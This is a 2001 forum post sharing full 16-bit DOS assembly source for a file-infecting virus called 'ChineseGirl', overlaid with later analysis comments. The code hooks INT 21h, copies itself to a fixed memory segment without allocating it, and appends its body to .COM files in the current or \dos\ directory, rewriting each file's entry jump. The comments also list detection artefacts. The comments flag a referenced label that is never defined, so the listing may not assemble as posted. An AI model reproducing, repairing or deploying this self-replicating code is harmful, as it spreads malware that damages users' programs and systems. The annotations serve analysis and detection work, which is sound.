December 7th, 2001, 09:05 AM
#1
nakoka's "ChineseGirl"
This is the first virus I have ever written. She is called ChineseGirl. I finished it about 2 years ago. It is just a small virus. I believe "assembly language + C = nuclear weapon" all the time!
; ---------------------------------------------------------------------
; Analysis notes. Only comments were added; every instruction and data
; line is exactly as posted.
; Dialect: 16-bit real-mode DOS, MASM/TASM-style directives.
; Behaviour visible in this listing, for triage and detection:
;   - reads and replaces the INT 21h vector (AX=3521h / AX=2521h in zd)
;     and keeps a copy of itself at the hard-coded segment 8D00h
;   - when a program issues INT 21h AH=30h, searches '*.com' or
;     '\dos\*.com' and appends its body to the files it finds
;   - static artefacts: the strings 'ChineseGirl! $' and '\dos\*.com',
;     and the body-length constant 673
; ---------------------------------------------------------------------
code segment
assume cs:code,ds:code
org 0h
; Entry point. Saves nine registers; nochg and bdend pop them in the
; reverse order.
begin :
push ax
push bx
push cx
push dx
push bp
push si
push di
push ds
push es
; Jumps over the data area. No label named ChineseGirl is defined
; anywhere in the visible listing.
jmp ChineseGirl
; File handle returned by the open call (stored at roc, read by seek/write/close).
handle dw ?
; One byte, 0E9h (opcode of a near JMP rel16); writee9 writes it to the file.
jmp db 0e9h
; '$'-terminated string printed with INT 21h AH=09h at print.
message db 'ChineseGirl! $'
; File size minus 3 (computed at c); writejmp writes it at file offset 1.
len dw ?
; Two bytes read from file offset 1 (read); recomputed at ee, written by writereal.
real dw ?
; Low word of the file size taken from the DTA (c); modified at ee.
dss dw ?
; Search masks: current directory, and \dos\ (chosen by clock hour, see n).
path db '*.com',0
fpath db '\dos\*.com',0
; '\dos\' prefix followed by 13 bytes that receive the found file name (open).
dos db '\dos\',13 dup(?)
; Not referenced anywhere in the visible listing.
no db 'Z'
; Far-pointer slot: nochg chains with `jmp cs:hh`; save_21 stores the
; previous INT 21h vector at an address derived from this label.
hh dd 11112222h
; Five bytes copied by zg to just after the resident body. In memory
; order they are 2E FF 2E 4A 00, which decodes as a CS-override far
; indirect JMP through offset 004Ah.
tc db 2eh
tc1 dw 2effh
tc2 dw 004ah
; Disk Transfer Area for FindFirst/FindNext (set with AH=1Ah at n);
; the code reads the size at dta+26 and the file name at dta+30.
dta db 45 dup(?)
; ---------------------------------------------------------------------
; zd: main routine. Runs in two contexts, told apart at nochg:
;   - inside a host program: performs the residency checks and, if not
;     yet installed, copies the body to 8D00h and hooks INT 21h
;   - as the INT 21h handler (CS = 8D00h): on AH=30h runs the file
;     search/append loop, otherwise chains to the saved handler
; All exits go through stop -> bdend.
; ---------------------------------------------------------------------
zd proc far
; DS = ES = CS so the data labels above are addressable.
mov bx,cs
mov es,bx
mov ds,bx
; Residency check 1: byte at 8D00h:0049h compared with 'D'
; (zg writes that marker after copying the body there).
push es
mov bx,8d00h
mov es,bx
cmp byte ptr es:[0049h],'D'
pop es
je o1
jmp o
o1:
; Residency check 2: word at 0000h:0086h is the segment half of the
; INT 21h vector (vector 21h is at 0000h:0084h); compared with 8D00h.
push es
mov bx,0
mov es,bx
cmp word ptr es:[86h],8d00h
pop es
je nochg
o:
save_21:
; INT 21h AX=3521h returns the current INT 21h handler in ES:BX.
; oldlen returns cs:[101h]+101h, so DI+2 = offset hh + cs:[101h] + 103h,
; i.e. hh relative to the same base zg uses for the body. The old
; vector is stored there as offset, then segment.
push es
mov ax,3521h
int 21h
mov di,offset hh
call oldlen
add di,ax
mov [di+2],bx
mov [di+2+2],es
pop es
jmp zg
; Not referenced by any jump in the visible listing.
stop1:
jmp stop
zg:
; SI = ds:[101h] + 3 + 100h: the word at offset 101h of the running
; .COM image (operand position of a 3-byte jump at 100h) plus 103h.
; 673 bytes are then copied from DS:SI to 8D00h:0000h.
; NOTE(review): segment 8D00h is hard-coded and no DOS memory
; allocation call appears in the listing, so whatever occupied that
; memory is overwritten -- a plausible source of crashes on an
; affected machine.
mov ax,ds:[101h]
add ax,3
add ax,100h
mov si,ax
mov ax,8d00h
push es
mov es,ax
mov di,0
mov cx,673
rep movsb
; Residency marker tested by check 1 above.
mov byte ptr es:[49h],'D'
pop es
; AX still holds 8D00h and DI = 673 after the copy. With DS = 8D00h the
; five bytes tc/tc1/tc2 are written immediately after the copied body.
push ds
mov ds,ax
mov ah,tc
mov byte ptr [di],ah
mov ax,tc1
mov word ptr [di+1],ax
mov ax,tc2
mov word ptr [di+3],ax
pop ds
chage_21h:
; INT 21h AX=2521h with DS:DX = 8D00h:0000h: points the INT 21h vector
; at the first byte of the copied body (the pushes at begin).
push ds
mov ax,8d00h
mov ds,ax
mov ax,2521h
mov dx,0
int 21h
pop ds
jmp stop
nochg:
; Reached when both residency checks pass. If CS is not 8D00h the code
; is running inside a host program and simply leaves via stop.
mov bx,cs
cmp bx,8d00h
jne stop
; Running as the INT 21h handler. AX has not been written since entry,
; so AH is the caller's function number. AH=30h (Get DOS Version)
; goes to n; every other call restores the saved registers and chains
; through the far pointer at cs:hh.
cmp ah,30h
je n
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
jmp cs:hh
n:
; AH=1Ah sets the DTA to dta. AH=2Ch reads the clock (hour in CH).
; Before 22:00 the mask is '*.com' (current directory); from 22:00 on
; it is '\dos\*.com'.
mov dx,offset dta
mov ah,1ah
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb fn
mov dx,offset fpath
jmp f
fn: mov dx,offset path
f:
; AH=4Eh FindFirst, CX=0 (no special attributes).
mov ah,4eh
mov cx,0
int 21h
start:
; Loop head for FindFirst/FindNext results. AX is compared with the
; DOS error codes 2 (file not found), 3 (path not found) and
; 18 (no more files); any of them ends the loop.
cmp ax,0002
jz stop
cmp ax,0003
je stop
cmp ax,0018
je stop
jmp open
stop:jmp bdend
open:
; Clock is read again. From 22:00 on, the 13-byte name field at dta+30
; is copied to dos+5 to form '\dos\<name>' and DX points at dos;
; otherwise DX points at the bare name in the DTA.
mov ah,2ch
int 21h
cmp ch,22
jb ro
mov di,offset dos +5
mov bx,offset dta +30
mov dx,offset dos
mov si,bx
mov cx,13
rep movsb
jmp roc
ro: mov dx,offset dta +30
roc:
; INT 21h AH=3Dh, AL=2: open the file read/write. The returned AX is
; stored in handle.
mov al,2
mov ah,3dh
int 21h
mov bx,ax
mov dx,offset handle
mov si,dx
mov [si],bx
readlen:
; BX = word at dta+26 (low word of the file size in the DTA).
mov dx,offset dta+26
mov si,dx
mov bx,[si]
c:
; dss = file size; len = size + 100h - 103h = size - 3.
mov dx,offset dss
mov si,dx
mov [si],bx
add bx,100h
sub bx,103h
mov dx,offset len
mov si,dx
mov [si],bx
read:
; Seek to offset 1 from the start of the file (AL=0, CX:DX = 0:1) and
; read 2 bytes into real (AH=3Fh).
mov al,0
mov dx,1
mov cx,0
call seek
mov dx,offset handle
mov si,dx
mov bx,[si]
mov dx,offset real
mov ah,3fh
mov cx,2
int 21h
; Already-processed test: DX = real + 103h - 100h + 676 = real + 679 is
; compared with dss (file size); if equal the file is closed without
; being written. Scanner heuristic that follows from this: the word at
; file offset 1 plus 679 equals the file length.
mov si,dx
push si
mov bx,[si]
add bx,103h
mov dx,offset dss
mov si,dx
mov dx,bx
sub dx,100h
add dx,673+3
cmp dx,[si]
jne ee
pop si
jmp close
; ee: dss += 100h + 673, then real is rewritten to
; (value read + 100h) - dss, i.e. (value read) - (file size) - 673.
ee: push si
add [si],100h+673
sub bx,3
pop si
sub bx,[si]
pop si
mov [si],bx
writebd:
; Seek to end of file (AL=2, CX:DX = 0) and write 673 bytes starting
; at offset begin.
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,673
mov dx,offset begin
call write
writee9:
; Seek to end of file and write the single byte at label jmp (0E9h).
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,1
mov dx,offset jmp
call write
writejmp:
; Seek to offset 1 from the start and overwrite 2 bytes with len.
mov dx,1
mov cx,0
mov al,0
call seek
mov cx,2
mov dx,offset len
call write
writereal:
; Seek to end of file and write the 2 bytes of real.
; Net effect on a file as coded: length grows by 673 + 1 + 2 = 676
; bytes, the word at offset 1 is replaced by len, and byte 0 is never
; written by this listing.
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,2
mov dx,offset real
call write
close:
; AH=3Eh closes the handle. Clock is read again: before 22:00 go
; straight to findnext, otherwise fall into print first.
mov dx,offset handle
mov si,dx
mov ah,3eh
mov bx,[si]
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb findnext
print:
; AH=09h prints the '$'-terminated message string.
mov dx,offset message
mov ah,09h
int 21h
findnext:
; Same hour test as at n, then AH=4Fh FindNext and back to start.
mov ah,2ch
int 21h
cmp ch,22
jb fnn
mov dx,offset fpath
jmp fff
fnn: mov dx,offset path
fff:
mov ah,4fh
int 21h
jmp start
; Follows an unconditional jmp and carries no label, so it is not
; reached in the visible flow.
int 20h
zd endp
; seek: INT 21h AH=42h (move file pointer) on the stored handle.
; In:  AL = origin as set by the caller (call sites use 0 = start, 2 = end),
;      CX:DX = offset
; Out: whatever INT 21h AH=42h returns; no error check is done here
; Clobbers: AH, BX, SI
seek proc near
; AX is saved around the handle load, although the load only touches BX/SI.
push ax
mov bx,offset handle
mov si,bx
mov bx,[si]
pop ax
mov ah,42h
int 21h
ret
seek endp
; oldlen: returns AX = cs:[101h] + 101h.
; save_21 adds this to offset hh and then stores at [di+2], so the
; effective base is cs:[101h] + 103h, the same value zg computes as the
; start of the body inside the running .COM image.
oldlen proc near
mov ax,cs:[101h]
add ax,101h
ret
oldlen endp
; write: INT 21h AH=40h (write to file) on the stored handle.
; In:  CX = byte count, DS:DX = buffer (both set by the caller)
; Out: whatever INT 21h AH=40h returns; no error check is done here
; Clobbers: AH, BX, SI
write proc near
mov bx,offset handle
mov si,bx
mov ah,40h
mov bx,[si]
int 21h
ret
write endp
; bdend: common exit. Restores the nine registers pushed at begin, in
; reverse order. No ret or jmp follows in this listing; execution runs
; on into whatever bytes come after the body. In a written file those
; are the 3 bytes appended by writee9/writereal; in the copy at 8D00h
; they are the 5 bytes that zg places after the 673-byte body.
bdend:
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
code ends
end begin